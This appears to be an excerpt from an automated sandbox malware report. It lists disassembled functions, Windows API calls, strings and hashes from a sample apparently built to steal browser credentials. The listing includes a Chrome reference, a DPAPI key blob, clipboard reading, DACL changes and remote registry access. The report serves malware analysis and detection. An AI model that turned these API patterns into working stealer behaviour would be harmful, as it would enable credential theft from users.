                                          • Part of subcall function 014C6E99: std::_Lockit::~_Lockit.LIBCPMT ref: 014C6F1C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 01422EFC
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01422F44
                                        • __Getcvt.LIBCPMT ref: 01422F50
                                          • Part of subcall function 01402350: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01402376
                                          • Part of subcall function 01402350: std::_Lockit::~_Lockit.LIBCPMT ref: 0140240A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Locinfo::_Lockit::_Lockit::~_std::locale::_$GetcvtH_prolog3InitLocinfo_ctorLocinfo_dtorSetgloballocale
                                        • String ID:
                                        • API String ID: 307478067-0
                                        • Opcode ID: 71c506f0b992986d9606c5f321def0ace38921151192f9a7866a6704868dae3c
                                        • Instruction ID: df5c0d6281350138b8dc28fd72e13e5068474e879a439c5986897fe0ebcc3dbc
                                        • Opcode Fuzzy Hash: 71c506f0b992986d9606c5f321def0ace38921151192f9a7866a6704868dae3c
                                        • Instruction Fuzzy Hash: B041A9B0C00789DEDB11CFA9C94078EFBF4BF28704F10861ED458AB291E7B5A248CB91
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0143FBEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: delayed %dms for lock/sharing conflict$winRead
                                        • API String ID: 2738559852-3590536915
                                        • Opcode ID: b6275f1d929e94382f3114d601076cedb30b232974c7a871b1dbdf13efed72ae
                                        • Instruction ID: e9c9970bffe506e0b1d13b502db4b28b368d59de3142ea35e82dff4842ca8253
                                        • Opcode Fuzzy Hash: b6275f1d929e94382f3114d601076cedb30b232974c7a871b1dbdf13efed72ae
                                        • Instruction Fuzzy Hash: 1051A172E001099BCB18CFA9D8909AEB7F5FF9C300F24412BE915E7360D635AD49CB91
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 01422FB4
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 01422FD5
                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 01422FE4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$AddfacLocimp::_Locimp_Lockit::_Lockit::~_std::locale::_
                                        • String ID:
                                        • API String ID: 4268195171-0
                                        • Opcode ID: 2f24c07e066c6166e523f64c18b81b4e135570d64172a87cf5ba830294bd8424
                                        • Instruction ID: 52c18b2a9d06a63472c2e2eadd3917b28103aad6e9a04daf0922d01d68b6fbf6
                                        • Opcode Fuzzy Hash: 2f24c07e066c6166e523f64c18b81b4e135570d64172a87cf5ba830294bd8424
                                        • Instruction Fuzzy Hash: 3431B7B1A006119FEB21DF59D494B6AB7F4FF64700F14002EE905CB364DB75E984CB90
                                        APIs
                                        • _vcomp_fork.VCOMP140(00000001,00000004,014FB7D0,?,00000000,00000004,?), ref: 0141EAEC
                                        Strings
                                        • RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4, xrefs: 0141EA10, 0141EA15, 0141EA31, 0141EA4C, 0141EA53
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _vcomp_fork
                                        • String ID: RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4
                                        • API String ID: 3592199487-3264951547
                                        • Opcode ID: 5ceeb7d88b3a0ae7e1211b93df762177d8d31909476853c748b37b6603f4dd9a
                                        • Instruction ID: 23e2602487a9fa204700db4937287bdf2120f172da5e29ac993c92e4489b4a8b
                                        • Opcode Fuzzy Hash: 5ceeb7d88b3a0ae7e1211b93df762177d8d31909476853c748b37b6603f4dd9a
                                        • Instruction Fuzzy Hash: 61518271E0021A9BDF14CFA9C851BAEBBF5FF58710F14412EE906B73A1D77599008BA0
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 01401BFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: Google Chrome
                                        • API String ID: 2659868963-3338836597
                                        • Opcode ID: 1bcfa254e849208117a06abe78489120d4f7050905ab9a25d02c8737a1c8f441
                                        • Instruction ID: ae399635034c9a3238e28e8e1761eea2f61d49a02a115982ab94be8283064ea2
                                        • Opcode Fuzzy Hash: 1bcfa254e849208117a06abe78489120d4f7050905ab9a25d02c8737a1c8f441
                                        • Instruction Fuzzy Hash: A6012B3941020F7BCF15ABDADC1485ABBECEF21650B50853BF604AF6A0FB70E5518391
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 0140DCE9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: WSAStartup failed
                                        • API String ID: 724789610-207067101
                                        • Opcode ID: 8e5f9c1c57c26c9ac2266cb8345c358db5da62d8fac1a497fefebef912116d01
                                        • Instruction ID: 7397e9452c19ff2fb62cdbafa6eea9f4a56e338e38ecb024e70da2e497da4935
                                        • Opcode Fuzzy Hash: 8e5f9c1c57c26c9ac2266cb8345c358db5da62d8fac1a497fefebef912116d01
                                        • Instruction Fuzzy Hash: 43F09071940258AEE7229F66CC45FD6BBF8FB05B10F0002AAF8659A284EBB059048A91
                                        APIs
                                        • _com_issue_error.COMSUPP ref: 014B98F2
                                        • SysFreeString.OLEAUT32(-00000001), ref: 014B9920
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeString_com_issue_error
                                        • String ID:
                                        • API String ID: 709734423-0
                                        • Opcode ID: 50abb49e0021068046b14021452d8eb34c4a47b842a29967ba5e90b0b0afd2ba
                                        • Instruction ID: b41077c6042d7c4b32bd6d224cea92d19a89bf998b5ee511a10623ec87b04638
                                        • Opcode Fuzzy Hash: 50abb49e0021068046b14021452d8eb34c4a47b842a29967ba5e90b0b0afd2ba
                                        • Instruction Fuzzy Hash: E321D1B1900716ABE7309F59D800B97FBE8EF51B24F20462FE96497390E7B5A844C7E0
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,014F3D97,?,00000000,?,?,014F4038,?,00000007,?,?,014F452C,?,?), ref: 014EC24B
                                        • GetLastError.KERNEL32(?,?,014F3D97,?,00000000,?,?,014F4038,?,00000007,?,?,014F452C,?,?), ref: 014EC256
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 485612231-0
                                        • Opcode ID: 529ba8e52c7c8070ba7c3c122a5e0d6281a8bc61576ea112357d59366fa305a5
                                        • Instruction ID: f0580bb2cb31ccbc397bd65c1af22c26232510bb66bb01c41f84e6d731de127b
                                        • Opcode Fuzzy Hash: 529ba8e52c7c8070ba7c3c122a5e0d6281a8bc61576ea112357d59366fa305a5
                                        • Instruction Fuzzy Hash: C8E08C72504208ABCB322FE9A80CB8A3E98AB01A56F114426FA0CAE160DA348584D7A0
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C2726
                                          • Part of subcall function 01401BC0: ___std_exception_copy.LIBVCRUNTIME ref: 01401BFE
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task___std_exception_copy
                                        • String ID:
                                        • API String ID: 1979911387-0
                                        • Opcode ID: 66fd8227a7661fb279d72f10298ff5d0bab8adc3cac2f27b43bea2c805f25fdd
                                        • Instruction ID: 9cd83263b7c32509668646cceef9adedfe6039cbb46277ff5edbee4a50db43bd
                                        • Opcode Fuzzy Hash: 66fd8227a7661fb279d72f10298ff5d0bab8adc3cac2f27b43bea2c805f25fdd
                                        • Instruction Fuzzy Hash: 92A17C75E002159FDB15CF68C894BAEFBF1EF58710F18816EE409AB3A1D7B1A941CB90
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0142D07E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 0e9236ad869117fb4399ad9779e1ef7056e19254a9cea46ed91a6b72828b230a
                                        • Instruction ID: c1a1b8ebea1f9da332c824173befe4018ab03c5afd05f8211cd079ca961ca52c
                                        • Opcode Fuzzy Hash: 0e9236ad869117fb4399ad9779e1ef7056e19254a9cea46ed91a6b72828b230a
                                        • Instruction Fuzzy Hash: 5251D3B2E0011AAFCF10DFB9CD949AEBBB6EF94254B24416BE514E7360D6319D41CB90
                                        APIs
                                        • RmStartSession.RSTRTMGR(?,00000000,?,00000000), ref: 014104EC
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SessionStart
                                        • String ID:
                                        • API String ID: 3722301762-0
                                        • Opcode ID: 86e285646d706ef4bb86dddba4a7d7e7f6b10f4581da2d08fe6ea1f7f0385c77
                                        • Instruction ID: 31cf97e2e06ed4c596d9aac33b6d130ff722489bd265e0350f57566e4f724f6e
                                        • Opcode Fuzzy Hash: 86e285646d706ef4bb86dddba4a7d7e7f6b10f4581da2d08fe6ea1f7f0385c77
                                        • Instruction Fuzzy Hash: 0B212731A0020D9FEB24CF68DD94BEE7BA4EB55310F60851EF918DB285DB3499C4CB81
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014323D0
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: c4b666a4a07afccc49991087d7e35fda107ad4c35b67fdf497f86c59ff2c90db
                                        • Instruction ID: e0aad056ec3e16d93769a44008112a7445b2125a599d37992b159ca1e95d6690
                                        • Opcode Fuzzy Hash: c4b666a4a07afccc49991087d7e35fda107ad4c35b67fdf497f86c59ff2c90db
                                        • Instruction Fuzzy Hash: BA0152B26016175FD300DFA9E81099AF7D8EFA8661714813BD518C3710E3B4E46187D1
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,014DA246,?,?,?,?,?,01401AF7,?,?,?), ref: 014ED244
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: a950422095fa3c96dda88b1f6d67e0d8a548af3fdd47679dddee1785eb834fe8
                                        • Instruction ID: fdc0a64f3b91ca4d3c564bb19e3cf503406ca9be3eebf92adc78cac7bce5790b
                                        • Opcode Fuzzy Hash: a950422095fa3c96dda88b1f6d67e0d8a548af3fdd47679dddee1785eb834fe8
                                        • Instruction Fuzzy Hash: A1E06C31D0511257EA311BE99D0CF5B3AC89F53273F050113ED149A1B1DB31D80181E6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 282a74a3296d818f1f302ff09088b1aa8004cf1ca3d25aeb4486e60c617e478d
                                        • Instruction ID: fbeefc16603843c6c6b58d78997026db846cab79aa0a645490426d28db45d3f1
                                        • Opcode Fuzzy Hash: 282a74a3296d818f1f302ff09088b1aa8004cf1ca3d25aeb4486e60c617e478d
                                        • Instruction Fuzzy Hash: 5AE01A7910160AABEF11DF54C945BAF3BB0FB15654F08800AEE146F2A0C634AA50CBA1
                                        APIs
                                        • _vcomp_fork.VCOMP140(00000001,00000002,014FB9E0,00000004,?,?,invalid stoi argument,stoi argument out of range), ref: 0141FB1D
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _vcomp_fork
                                        • String ID:
                                        • API String ID: 3592199487-0
                                        • Opcode ID: 151f88b48800b8b3c819145fb7d43616a6b2d90bd8bd07150cede770dcfd2c41
                                        • Instruction ID: cf1285cbc64916c1303d606b7fe678ca100ef1ec61d77d9d16d90b792a1fbd70
                                        • Opcode Fuzzy Hash: 151f88b48800b8b3c819145fb7d43616a6b2d90bd8bd07150cede770dcfd2c41
                                        • Instruction Fuzzy Hash: 9EB012E17D030439F01C22018C0BF5710048320F10F64018E73062D2D278E12C500075
                                        APIs
                                        • OpenClipboard.USER32(00C80980), ref: 00C64440
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6444E
                                        • GetClipboardData.USER32(0000000D), ref: 00C64456
                                        • CloseClipboard.USER32 ref: 00C64462
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6447E
                                        • CloseClipboard.USER32 ref: 00C64488
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C6449D
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00C644AA
                                        • GetClipboardData.USER32(00000001), ref: 00C644B2
                                        • GlobalLock.KERNEL32(00000000), ref: 00C644BF
                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C644F3
                                        • CloseClipboard.USER32 ref: 00C64603
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 4f8d1ddf4130672f7b083727e20b84a432220b6f90b779331c39e27b348977f9
                                        • Instruction ID: bc7403b0e1f71c5610c7a129784d7b9e530bde12a3dc932f09590f9773768f34
                                        • Opcode Fuzzy Hash: 4f8d1ddf4130672f7b083727e20b84a432220b6f90b779331c39e27b348977f9
                                        • Instruction Fuzzy Hash: 0A51C171244201AFD354EF60DC8AF7E77A8AF84B51F100529F956D21E2EF70DA08DB66
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00C5E18C
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C5E19C
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C5E1A8
                                        • __wsplitpath.LIBCMT ref: 00C5E206
                                        • _wcscat.LIBCMT ref: 00C5E21E
                                        • _wcscat.LIBCMT ref: 00C5E230
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5E245
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E259
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E28B
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E2AC
                                        • _wcscpy.LIBCMT ref: 00C5E2B8
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C5E2F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                        • String ID: *.*
                                        • API String ID: 3566783562-438819550
                                        • Opcode ID: 2ecff32e5e82d0c8bf1760dfb275278183d2ac2767ffdf75152a380cea11f81a
                                        • Instruction ID: 929ded5e5c03ec32394b6b472336d1d411d3ac69c9ed2690de2ea5f8e3579703
                                        • Opcode Fuzzy Hash: 2ecff32e5e82d0c8bf1760dfb275278183d2ac2767ffdf75152a380cea11f81a
                                        • Instruction Fuzzy Hash: 98618B765047059FC714EF60C885AAFB3E8FF89310F04491DF99987251DB31EA89CB96
                                        APIs
                                          • Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48C1F
                                          • Part of subcall function 00C48C03: GetLastError.KERNEL32(?,00C486E3,?,?,?), ref: 00C48C29
                                          • Part of subcall function 00C48C03: GetProcessHeap.KERNEL32(00000008,?,?,00C486E3,?,?,?), ref: 00C48C38
                                          • Part of subcall function 00C48C03: HeapAlloc.KERNEL32(00000000,?,00C486E3,?,?,?), ref: 00C48C3F
                                          • Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48C56
                                          • Part of subcall function 00C48CA0: GetProcessHeap.KERNEL32(00000008,00C486F9,00000000,00000000,?,00C486F9,?), ref: 00C48CAC
                                          • Part of subcall function 00C48CA0: HeapAlloc.KERNEL32(00000000,?,00C486F9,?), ref: 00C48CB3
                                          • Part of subcall function 00C48CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C486F9,?), ref: 00C48CC4
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48714
                                        • _memset.LIBCMT ref: 00C48729
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48748
                                        • GetLengthSid.ADVAPI32(?), ref: 00C48759
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C48796
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C487B2
                                        • GetLengthSid.ADVAPI32(?), ref: 00C487CF
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C487DE
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C487E5
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48806
                                        • CopySid.ADVAPI32(00000000), ref: 00C4880D
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C4883E
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48864
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48878
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 3996160137-0
                                        • Opcode ID: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
                                        • Instruction ID: 9210b84e1b0182f219caba6aa7880aece591d9d16e0425c1a1e9289760258c71
                                        • Opcode Fuzzy Hash: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
                                        • Instruction Fuzzy Hash: AA613672900209AFDF44DFA4DC84BAEBB79FF04314F548129F825A7290DB359A09DB64
                                        APIs
                                          • Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C708D4
                                          • Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
                                          • Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C70973
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C70A0B
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C70C4A
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C70C57
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: 6e91e0f0f6b2d686c7d097c055ca8822142ba118ff0275073f39fd59fcf4e0a8
                                        • Instruction ID: cfcb01db3dc28de7dc22b5cd1bd54bb76b1fea07e779702c7310848bda524f64
                                        • Opcode Fuzzy Hash: 6e91e0f0f6b2d686c7d097c055ca8822142ba118ff0275073f39fd59fcf4e0a8
                                        • Instruction Fuzzy Hash: 73E13A31204214EFCB15DF29C891E2ABBE4EF89314F14856DF95ADB2A2DB30ED05DB52
                                        APIs
                                        • __swprintf.LIBCMT ref: 00C542BE
                                        • __swprintf.LIBCMT ref: 00C542CB
                                          • Part of subcall function 00C137FA: __woutput_l.LIBCMT ref: 00C13853
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00C542F5
                                        • LoadResource.KERNEL32(?,00000000), ref: 00C54301
                                        • LockResource.KERNEL32(00000000), ref: 00C5430E
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00C5432E
                                        • LoadResource.KERNEL32(?,00000000), ref: 00C54340
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00C5434F
                                        • LockResource.KERNEL32(?), ref: 00C5435B
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 00C543BC
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID:
                                        • API String ID: 1433390588-0
                                        • Opcode ID: 5d2e16c9be7bf903b5f70af402ddc3cdd97ed6f004c073dc27b68fe0249dd58c
                                        • Instruction ID: 6da7958b4184a1e37e2047c1e2eccc500fe3d4288ec5be9f73c49ad78086fb78
                                        • Opcode Fuzzy Hash: 5d2e16c9be7bf903b5f70af402ddc3cdd97ed6f004c073dc27b68fe0249dd58c
                                        • Instruction Fuzzy Hash: 1E31C07550021AABCB189F61DD48BBF7BACEF04306F104519FD16D2160D770DA99DBA8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
